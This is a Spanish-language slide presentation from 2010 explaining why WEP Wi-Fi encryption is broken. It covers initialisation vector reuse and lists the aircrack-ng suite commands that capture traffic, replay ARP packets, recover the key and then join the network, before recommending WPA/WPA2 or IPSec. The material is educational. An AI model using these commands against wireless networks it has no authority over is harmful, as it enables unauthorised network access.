Cracking WEP

WEP – WiredEquivalentPrivacy
Protocolo de encriptación
5/13 caracteres ASCII o 10/26 caracteres hexadecimales
Vulnerabilidades descubiertas en 2001
Sustituido por WPA (Wi-Fi Protected Access) en 2003
Declarado obsoleto en 2004

El Problema
Protocolo defectuoso
40/104 bits de clave + 24 bits de vector de inicialización
50 % de probabilidad de que un VI se repita después de 5000 paquetes
El numero máximo de VIs diferentes es limitado

El Ataque
Hacer que el Access Point agote los VIs posibles
Recolectar 50.000+ VIs
Conseguir la clave utilizando un método estadístico
Tiempo de ejecución 5-15 min

El Ataque
airmon-ngstart wlan0
airodump-ng -c canal -w test --encryptwep mon0
aireplay-ng -3 -b mac_ap -h mac_cliente_conectado wlan0
aircrack-ng -e nombrered test*.cap

El Ataque
airmon-ng stop mon0
airmon-ng stop wlan0
ifconfig wlan0 down
iwconfig wlan0 channel x essidnombreredkey s:clave modemanaged
ifconfig wlan0 up
servicenetworkingrestart

The Tools
BackTrack 4
Suite Aircrack-ng
Tarjeta inalámbrica soportada o paciencia… en algunos casos :)

El Remedio
WPA/WPA2
IPSec
WEP en Modo Open (solo un poco mas seguro que WEP)

Sources
http://www.aircrack-ng.org/doku.php
http://www.backtrack-linux.org
http://es.wikipedia.org/wiki/WEP

Cracking WEP

by Hernan Reyes on Oct 06, 2010

Accessibility

Categories

Tags

Upload Details

Usage Rights

Statistics

Cracking WEP — Presentation Transcript